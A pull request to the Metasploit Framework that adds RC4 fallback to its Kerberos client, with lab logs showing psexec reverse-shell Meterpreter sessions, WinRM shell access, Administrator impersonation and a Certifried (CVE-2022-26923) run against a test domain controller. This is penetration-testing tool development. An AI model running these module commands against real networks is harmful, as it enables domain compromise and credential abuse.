### PR TITLE
Update kerberos to negotiate rc4 if aes256 is disabled

### DIFF
--- a/documentation/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.md
@@ -38,6 +38,7 @@ The module will go through the following steps:
   this CA" on the "CA Name" tab (this value corresponds to the CA datastore
   option)
 - Accept the rest of the default settings and complete the configuration
+- Restart the server to ensure LDAPS on port 636 is running
 
 
 ## Verification Steps

--- a/lib/msf/core/exploit/remote/kerberos/client.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client.rb
@@ -145,13 +145,13 @@ module Msf
           # behaviour on Windows, but let's be sure about it.
           #
           # @param client_etypes [Array<Integer>] Available ciphers on the client side (etypes from Rex::Proto::Kerberos::Crypto::Encryption)
-          # @param server_etypeinfos [Array<Rex::Proto::Kerberos::Model::EtypeInfo2>] Available ciphers (including additional info such as salts) on the server
+          # @param server_etypeinfos [Array<Rex::Proto::Kerberos::Model::PreAuthEtypeInfo2Entry>] Available ciphers (including additional info such as salts) on the server
           # @return [Rex::Proto::Kerberos::Model::EtypeInfo] The selected cipher
-          def select_cipher(client_etypes, server_etypeinfos)
+          def select_cipher(client_etypes, server_etypeinfos_entries)
             client_etypes.each do |client_etype|
-              server_etypeinfos.etype_info2_entries.each do |server_etypeinfo|
-                if server_etypeinfo.etype == client_etype
-                  return server_etypeinfo
+              server_etypeinfos_entries.each do |server_etypeinfo2_entry|
+                if server_etypeinfo2_entry.etype == client_etype
+                  return server_etypeinfo2_entry
                 end
               end
             end
@@ -303,46 +303,68 @@ module Msf
             etype_entries = pa_data.find {|entry| entry.type == Rex::Proto::Kerberos::Model::PreAuthType::PA_ETYPE_INFO2}
 
             # No etypes specified - how are we supposed to negotiate ciphers?
-            raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new(res: initial_as_res) unless etype_entries
+            raise Rex::Proto::Kerberos::Model::Error::KerberosEncryptionNotSupported.new(encryption_type: offered_etypes) unless etype_entries
+
             server_ciphers = etype_entries.decoded_value
-
-            selected_etypeinfo = select_cipher(offered_etypes, server_ciphers)
-            selected_etype = selected_etypeinfo.etype
-
-            if password
-              salt = selected_etypeinfo.salt
-              salt.force_encoding('utf-8') if salt
-              params = selected_etypeinfo.s2kparams
-
-              encryptor = Rex::Proto::Kerberos::Crypto::Encryption::from_etype(selected_etype)
-              enc_key = encryptor.string_to_key(password, salt, params: params)
-            elsif key
-              raise ArgumentError.new('Encryption key provided without one offered encryption type') unless options[:offered_etypes]&.length == 1
-              enc_key = key
+            remaining_server_ciphers_to_attempt = server_ciphers.etype_info2_entries.select do |server_etypeinfo2_entry|
+              offered_etypes.include?(server_etypeinfo2_entry.etype)
             end
 
-            preauth_as_req = build_as_request(
-              pa_data: [
-                build_as_pa_time_stamp(key: enc_key, etype: selected_etype),
-                build_pa_pac_request(pac_request_value: request_pac)
-              ],
-              body: build_as_request_body(
-                client_name: client_name,
-                server_name: server_name,
-                realm: realm,
-                key: enc_key,
+            if remaining_server_ciphers_to_attempt.empty?
+              raise Rex::Proto::Kerberos::Model::Error::KerberosEncryptionNotSupported.new(encryption_type: offered_etypes)
+            end
 
-                etype: offered_etypes,
+            # Attempt to use the available ciphers; In some scenarios they can fail due to GPO configurations
+            # So we need to iterate until a success - or there's no more ciphers available
+            while remaining_server_ciphers_to_attempt.any?
+              selected_etypeinfo = select_cipher(offered_etypes, remaining_server_ciphers_to_attempt)
+              selected_etype = selected_etypeinfo.etype
 
-                # Specify nil to ensure the KDC uses the current time for the desired starttime of the requested ticket
-                from: nil,
-                till: expiry_time,
-                rtime: expiry_time
+              if password
+                salt = selected_etypeinfo.salt
+                salt = salt.dup.force_encoding('utf-8') if salt
+                params = selected_etypeinfo.s2kparams
+
+                encryptor = Rex::Proto::Kerberos::Crypto::Encryption::from_etype(selected_etype)
+                enc_key = encryptor.string_to_key(password, salt, params: params)
+              elsif key
+                raise ArgumentError.new('Encryption key provided without one offered encryption type') unless options[:offered_etypes]&.length == 1
+                enc_key = key
+              end
+
+              preauth_as_req = build_as_request(
+                pa_data: [
+                  build_as_pa_time_stamp(key: enc_key, etype: selected_etype),
+                  build_pa_pac_request(pac_request_value: request_pac)
+                ],
+                body: build_as_request_body(
+                  client_name: client_name,
+                  server_name: server_name,
+                  realm: realm,
+                  key: enc_key,
+
+                  etype: remaining_server_ciphers_to_attempt.map(&:etype),
+
+                  # Specify nil to ensure the KDC uses the current time for the desired starttime of the requested ticket
+                  from: nil,
+                  till: expiry_time,
+                  rtime: expiry_time
+                )
               )
-            )
 
-            preauth_as_res = send_request_as(req: preauth_as_req)
-            if preauth_as_res.msg_type != Rex::Proto::Kerberos::Model::AS_REP
+              preauth_as_res = send_request_as(req: preauth_as_req)
+
+              # If we've succeeded - break out of trying ciphers
+              break if preauth_as_res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
+
+              # If we've hit a cipher not supported error, try the next cipher if there's more to try
+              is_etype_not_supported_error = preauth_as_res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR && preauth_as_res.error_code == Rex::Proto::Kerberos::Model::Error::ErrorCodes::KDC_ERR_ETYPE_NOSUPP
+              if is_etype_not_supported_error
+                remaining_server_ciphers_to_attempt -= [selected_etypeinfo]
+                next if remaining_server_ciphers_to_attempt.any?
+              end
+
+              # Unexpected server response
               raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new(res: preauth_as_res)
             end
 

--- a/lib/msf/core/exploit/remote/kerberos/client/pkinit.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/pkinit.rb
@@ -142,7 +142,7 @@ module Msf
                 keysize = 16
               else
                 # This is unsupported per the spec
-                raise KerberosEncryptionNotSupported.new('Unsupported DH Key exchange encryption type', encryption_type: etype)
+                raise Rex::Proto::Kerberos::Model::Error::KerberosEncryptionNotSupported.new("Unsupported DH Key exchange encryption type #{etype}", encryption_type: etype)
               end
 
               result = ''

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -568,7 +568,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       value: credential.keyblock.data.value
     )
 
-    etypes = Set.new([ticket.enc_part.etype])
+    etypes = Set.new([credential.keyblock.enctype.value])
     tgs_options = {
       pa_data: [],
       ticket_storage: ticket_storage

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -347,7 +347,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       value: credential.keyblock.data.value
     )
 
-    etypes = Set.new([ticket.enc_part.etype])
+    etypes = Set.new([credential.keyblock.enctype.value])
     etypes << Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC
 
     tgs_options = {
@@ -377,7 +377,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
   # Request a service ticket to another service on behalf of a user
   #
-  # @param [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential from the TGT
+  # @param [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] credential The ccache credential from the TGT
   # @param [Hash] options
   # @option options [Rex::Proto::Kerberos::Model::PrincipalName] :sname The target service principal name.
   # @option options [Rex::Proto::Kerberos::Model::Ticket] :tgs_ticket The service ticket to the first service.
@@ -412,7 +412,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       value: pa_pac_options.encode
     )
 
-    etypes = Set.new(etypes)
+    etypes = Set.new([credential.keyblock.enctype.value])
     etypes << Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC
     etypes << Rex::Proto::Kerberos::Crypto::Encryption::DES_CBC_MD5
     etypes << Rex::Proto::Kerberos::Crypto::Encryption::DES3_CBC_SHA1


### PR DESCRIPTION
Updates the Kerberos logic to negotiate rc4 if aes256 is disabled

Easier to review with whitespace removed - https://github.com/rapid7/metasploit-framework/pull/17534/files?diff=unified&w=1

### Before

The Kerberos client would use aes256 encryption (etype 18) and fail:

```
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smbauth=kerberos domaincontrollerrhost=192.168.123.13 smbrhostname=dc3.adf3.local domain=adf3.local krbcachemode=write-only

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|adf3.local as user 'Administrator'...
[-] 192.168.123.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type
[*] Exploit completed, but no session was created.
```

### Afer

The kerberos client initially chooses aes256 encryption (etype 18) and if it fails, it falls back to trying the next supported cipher i.e. rc4 (etype 23)

```
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smbauth=kerberos domaincontrollerrhost=192.168.123.13 smbrhostname=dc3.adf3.local domain=adf3.local krbcachemode=write-only

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|adf3.local as user 'Administrator'...
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230124215044_default_192.168.123.13_mit.kerberos.cca_596025.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230124215044_default_192.168.123.13_mit.kerberos.cca_428070.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] 192.168.123.13:445 - Selecting PowerShell target
[*] 192.168.123.13:445 - Executing the payload...
[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 8 opened (192.168.123.1:4444 -> 192.168.123.13:59217) at 2023-01-24 21:50:46 +0000

meterpreter > 
```

## Verification


### set up

First configure your KDC's kerberos network encryption types to only support rc4_hmac_md5 encryption

1. Create a new policy

![image](https://user-images.githubusercontent.com/60357436/214430400-d86ea620-e709-4d25-b80b-4d4840f4260f.png)

2. Set the encryption types

![image](https://user-images.githubusercontent.com/60357436/214430457-5485794b-04a7-4d65-bd10-594501e4f0ec.png)

3. Ensure you've linked the GPO

![image](https://user-images.githubusercontent.com/60357436/214430514-337e7d04-6cc5-4ccb-9c45-cdaafb339b61.png)

4. Verify you've updated your local policy

```
# apply the GPO changes
gpupdate /force

# verify it's applied
gpresult /H c:/result.html /f
```

Now Open `c:/result.html` in your browser and verify the encryption types are as expected:

![image](https://user-images.githubusercontent.com/60357436/214430689-e7de0c31-0b33-42cf-b9ed-17097cbfcb1a.png)


### Tests

psexec

```
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smbauth=kerberos domaincontrollerrhost=192.168.123.13 smbrhostname=dc3.adf3.local domain=adf3.local krbcachemode=write-only
...
meterpreter > 
```

ldap

```
in=adf3.local domaincontrollerrhost=192.168.123.13
[*] Running module against 192.168.123.13

[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230124215507_default_192.168.123.13_mit.kerberos.cca_330157.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230124215507_default_192.168.123.13_mit.kerberos.cca_873072.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 192.168.123.13:389 Discovered base DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local
==========================================

 Name                Attributes
 ----                ----------
 badpwdcount         0
 description         Built-in account for administering the computer/domain
 lastlogoff          1601-01-01 00:00:00 UTC
 lastlogon           2023-01-24 21:55:07 UTC
 logoncount          200
 memberof            CN=Group Policy Creator Owners,CN=Users,DC=adf3,DC=local || CN=Domain Admins,CN=Users,DC=adf3,DC=local || CN=Enterprise Admins,CN=Users,DC=adf3,DC=loca
                     l || CN=Schema Admins,CN=Users,DC=adf3,DC=local || CN=Administrators,CN=Builtin,DC=adf3,DC=local
 name                Administrator
 pwdlastset          133189448681297271
 samaccountname      Administrator
 useraccountcontrol  512



etc 
```

get_ticket:

```
msf6 auxiliary(admin/kerberos/get_ticket) > rerun verbose=true rhosts=192.168.123.13 domain=adf3.local username=Administrator action=GET_TGT password=p4$$w0rd
[*] Reloading module...
[*] Running module against 192.168.123.13

[*] 192.168.123.13:88 - Getting TGT for Administrator@adf3.local
[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:88 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230124215541_default_192.168.123.13_mit.kerberos.cca_383140.bin
[*] Auxiliary module execution completed
```

get ticket with impersonation:

```
msf6 auxiliary(admin/kerberos/get_ticket) > rerun verbose=true rhosts=192.168.123.13 domain=adf3.local username=fake_computer password=p4$$w0rd action=GET_TGS spn=cifs/dc3.adf3.local impersonate=Administrator
[*] Reloading module...
[*] Running module against 192.168.123.13

[*] 192.168.123.13:88 - Using cached credential for krbtgt/ADF3.LOCAL@ADF3.LOCAL fake_computer@ADF3.LOCAL
[*] 192.168.123.13:88 - Getting TGS impersonating Administrator@adf3.local (SPN: cifs/dc3.adf3.local)
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230125005854_default_192.168.123.13_mit.kerberos.cca_174703.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230125005854_default_192.168.123.13_mit.kerberos.cca_705507.bin
[*] Auxiliary module execution completed
```

Note that get_ticket with an aes_key gives a user error:

```
msf6 auxiliary(admin/kerberos/get_ticket) > rerun verbose=true rhosts=192.168.123.13 domain=adf3.local username=Administrator action=GET_TGT aes_key=56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01
[*] Reloading module...
[*] Running module against 192.168.123.13

[*] 192.168.123.13:88 - Getting TGT for Administrator@adf3.local
[-] Auxiliary aborted due to failure: unknown: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type
[*] Auxiliary module execution completed
```

winrm working - and forwardable ticket viewable in klist:

```
msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrmauth=kerberos domaincontrollerrhost=192.168.123.13 winrmrhostname=dc3.adf3.local domain=adf3.local

[*] 192.168.123.13:88 - Using cached credential for krbtgt/ADF3.LOCAL@ADF3.LOCAL Administrator@ADF3.LOCAL
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:5985   - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230124215612_default_192.168.123.13_mit.kerberos.cca_842896.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...
[+] 192.168.123.13:5985 - Login Successful: adf3.local\Administrator:p4$$w0rd
[*] Command shell session 2 opened (192.168.123.1:53190 -> 192.168.123.13:5985) at 2023-01-24 21:56:13 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
[*] Starting interaction with 2...

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Administrator> C:\Users\Administrator>klist
exitklist

Current LogonId is 0:0x8e5033

Cached Tickets: (1)

#0>	Client: Administrator @ ADF3.LOCAL
	Server: krbtgt/ADF3.LOCAL @ ADF3.LOCAL
	KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
	Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize 
	Start Time: 1/24/2023 21:56:12 (local)
	End Time:   1/25/2023 7:55:07 (local)
	Renew Time: 1/25/2023 21:55:07 (local)
	Session Key Type: RSADSI RC4-HMAC(NT)
	Cache Flags: 0x1 -> PRIMARY 
	Kdc Called: 
```

Certifried: Doesn't negotiate with rc4 due to https://github.com/rapid7/metasploit-framework/commit/58c30f10aafa9fa46b89734fab400f8c36b4ba5a#diff-6bbbf991ed5faa7f663687cc42b3adce5ad39658f148fcf784428481dc4a7512R71 - although I was able to hack things locally to work, apparently ktruncate isn't defined for rc4? I'll not block on this.

```
msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd ca=adf3-DC3-CA dc_name=dc3 domain=adf3.local
[*] Running module against 192.168.123.13

[+] 192.168.123.13:445 - Successfully authenticated to LDAP (192.168.123.13:636)
[+] 192.168.123.13:445 - Successfully created adf3.local\DESKTOP-4UU2HVYV$
[+] 192.168.123.13:445 -   Password: OovhmJABl8nyRcGPQh9x1ZhXjXxaSjJu
[+] 192.168.123.13:445 -   SID:      S-1-5-21-1266190811-2419310613-1856291569-2108
[+] 192.168.123.13:445 - Successfully authenticated to LDAP (192.168.123.13:636)
[*] 192.168.123.13:445 - Attempting to set the DNS hostname for the computer DESKTOP-4UU2HVYV$ to the DNS hostname for the DC: dc3
[+] 192.168.123.13:445 - Successfully changed the DNS hostname
[+] 192.168.123.13:445 - The requested certificate was issued.
[*] 192.168.123.13:445 - Certificate stored at: /Users/adfoster/.msf4/loot/20230124235321_default_192.168.123.13_windows.ad.cs_526380.pfx
[*] 192.168.123.13:445 - Attempting PKINIT login for dc3$@adf3.local
[-] 192.168.123.13:445 - Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type
[*] 192.168.123.13:445 - Deleting the computer account DESKTOP-4UU2HVYV$
[+] 192.168.123.13:445 - The specified computer has been deleted.
[-] 192.168.123.13:445 - Auxiliary aborted due to failure: unexpected-reply: Unable to request the TGT.
[*] Auxiliary module execution completed
```
